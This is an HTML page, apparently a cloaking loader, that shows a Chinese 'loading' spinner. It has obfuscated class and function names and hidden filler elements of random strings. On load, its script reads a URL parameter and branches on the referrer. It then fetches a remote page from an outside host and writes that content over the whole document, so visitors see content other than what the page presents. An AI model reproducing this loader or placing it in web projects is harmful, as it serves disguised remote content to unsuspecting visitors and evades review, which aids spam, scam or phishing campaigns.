<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LWdNZnN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LWdNZnN .PG3LK2u6f3K {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LWdNZnN .content {
            line-height: 50px;
            text-align: center
        }

        .LWdNZnN .img {
            width: 100%
        }

        .LWdNZnN .V3ot9A {
            text-align: center
        }

        .LWdNZnN .V3ot9A span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LWdNZnN .V3ot9A span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LWdNZnN .V3ot9A span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LWdNZnN .V3ot9A span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LWdNZnN .V3ot9A span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LWdNZnN .V3ot9A span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LWdNZnN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DfOXpJd0yS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Lj2fVC = DfOXpJd0yS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Lj2fVC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Lj2fVC +".html?a=share";
		}
		
        yybbrKGljz=url+"#"+new Date().getTime();
        yybbrKGljz && function() {
            $.get(yybbrKGljz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>tyi9fizjzyng4</a>
<ul style='display:none' >BI75xv7dvk51YSuCNr5nxhBaiu4P4sBerzvGfmHtWLnfwZyKAiNMg4k0DVZKRzWhwB1FF4jmhPwjm2PHdDgzBP</ul>
<p  style='display:none'>mqAcOzOIMLkDfNvJw9OGXof8kfKX0KaBwXtvEGbL</p>
<b style='display:none' >A8QwOAUP5Ra4cosToVZCjfHNrfYneW3p0rBNR1T8KUdBefWWCApE</b>
<p  style='display:none'>mqAcOzOIMLkDfNvJw9OGXof8kfKX0KaBwXtvEGbL</p>
<img  src='' style='display:none'><div class="LWdNZnN">
    <div class="PG3LK2u6f3K">
        <div class="V3ot9A">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >J0kU2uAcp8uQvBkBK9lsg</ul>
<div style='display:none'>qrMOJqAqgQnln4IwQMTUuSGR6uP6L5zpU3QbplMGUMOua1zDFjRLHWBH5MRR2WDwbE7</div>
<div style='display:none'>qrMOJqAqgQnln4IwQMTUuSGR6uP6L5zpU3QbplMGUMOua1zDFjRLHWBH5MRR2WDwbE7</div></body>
</html>